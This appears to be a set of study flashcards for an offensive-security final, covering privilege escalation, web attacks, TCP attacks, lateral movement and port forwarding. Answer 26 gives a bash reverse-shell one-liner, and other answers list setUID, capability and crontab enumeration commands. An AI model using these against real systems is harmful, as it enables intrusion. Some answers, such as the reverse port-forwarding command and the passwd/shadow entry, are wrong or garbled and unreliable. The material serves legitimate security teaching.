Final

Question 1

What are the 4 main ways to do Privilege Escalation?

Answer 1

1. Known Exploits
2. Direct Method
3. Indirect Method
4. Credential Theft

Question 2

What command shows you what you can run as sudo?

Answer 2

sudo -l

Question 3

What are setUID programs?

Answer 3

Executables that, when run, will take on the privileges of the owner

Question 4

What command shows all setUID programs on the system?

Answer 4

find / -perm -4000 2>/dev/null

Question 5

What are capabilities?

Answer 5

Executables that, when run, have special abilities that the user might not have themselves

Question 6

What command shows all capabilities on the system?

Answer 6

getcap -r / 2>/dev/null

Question 7

What is UAC on Windows?

Answer 7

Similar to sudo

Question 8

How can you view the crontab?

Answer 8

cat /etc/crontab

Question 9

How can you find public config files?

Answer 9

find /etc -type f -perm -2

Question 10

How can you find scheduled tasks on windows?

Answer 10

schtasks

Question 11

How can you find windows services?

Answer 11

sc

Question 12

What is LOLBAS?

Answer 12

GTFOBins for Windows

Question 13

Explain how Windows paths can be exploited

Answer 13

Unquoted paths can be exploited if there are spaces in directory names

Question 14

Whats the difference between /etc/shadow and /etd/passwd

Answer 14

/etc/passwd has users etc/shadow
has password hashes

Question 15

What is in band SQLi?

Answer 15

uses the same communication channel to execute the attack and retrieve the results

Question 16

Whats the best way to defend against SQLi?

Answer 16

Prepared statements/sanitize inputs

Question 17

What is Cross Site Request Forgery (CSRF)?

Answer 17

An attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated

Question 18

What is Stored CSRF?

Answer 18

When the CSRF payload is stored on the webpage itself

Question 19

What actions can you perform with a CSRF attack?

Answer 19

POST
GET
PUT
DELETE

Question 20

What does the Same Origin Policy (SOP) protect against?

Answer 20

CSRF due to a script making an HTTP PUT to another origin

Question 21

Whats the best way to defend against CSRF?

Answer 21

CSRF Token

Question 22

What is Cross Site Scripting (XSS)?

Answer 22

A type of injection, in which malicious scripts are injected into otherwise benign and trusted websites

Question 23

What is the TCP handshake?

Answer 23

SYN, SYN+ACK, ACK

Question 24

What is SYN Flooding?

Answer 24

An attacker floods the TCP server with half-open TCP connections which then causes the TCP server to not receive any more connections

Question 25

How can SYN Flooding be prevented?

Answer 25

TCP Retransmission
Size of SYN Queue
TCP Cache
SYN Cookie

Question 26

What is a general command to get a reverse shell?

Answer 26

/bin/bash -i > /dev/tcp/<ip>/<port> 0<&1 2>&1</port></ip>

Question 27

How does the Mitnick attack work?

Answer 27

1. Disable the trusted server
2. Attacker creates and hijacks a TCP session by spoofing the following from the Trusted Server:
   1) SYN
   2) ACK
   3) RSH command
3. Spoof the return connection from the victim server

Question 28

How do SYN cookies defend against SYN flooding?

Answer 28

1. The attacker does not receive the SYN/ACK from the server and cannot calculate the value of the SYN/ACK’s sequence number
2. The server does not keep a SYN queue

Question 29

When injecting data into an existing TCP session, why do you not have to guess the sequence number exactly?

Answer 29

As long as you get the sequence number within the TCP sliding window, the data will be sent to the application eventually

Question 30

Lateral Movement

Answer 30

Any “advancement” in the network that is not an “elevation”

Question 31

What are the different lateral movement techniques?

Answer 31

PsExec
WinRM
WMI
Smbexec

Question 32

What is a Pass-The-Hash attack?

Answer 32

When you can authenticate with just the hash of a password, instead of the plaintext

Question 33

What is static port forwarding?

Answer 33

Destinations are fixed
One tunnel for each destination

Question 34

What is dynamic port forwarding?

Answer 34

Destinations are NOT fixed
One tunnel for many destinations
Uses SOCKS proxy

Question 35

What does a forward static port forwarding command look like?

Answer 35

ssh -4NT -L [local port]:[end goal ip]:[end goal port] user@[intermediate ip] (run on local machine)

Question 36

What does a reverse static port forwarding command look like?

Answer 36

ssh -4NT -L 0.0.0.0:[home port]:[end goal ip]:[end goal port] user@[home ip] (run on remote machine)

Question 37

Explain Metasploit route and autoroute

Answer 37

Route - route to a particular IP address through an existing session
Autoroute - Post module to add new routes found from a session

Question 38

What is a wormable vulnerability?

Answer 38

A network vulnerability which can allow a worm to self-propagate by automatically gaining RCE on new hosts

Question 39

When we perform the buffer overflow, what values do we overwrite on the stack?

Answer 39

The return address
The previous frame pointer
The function arguments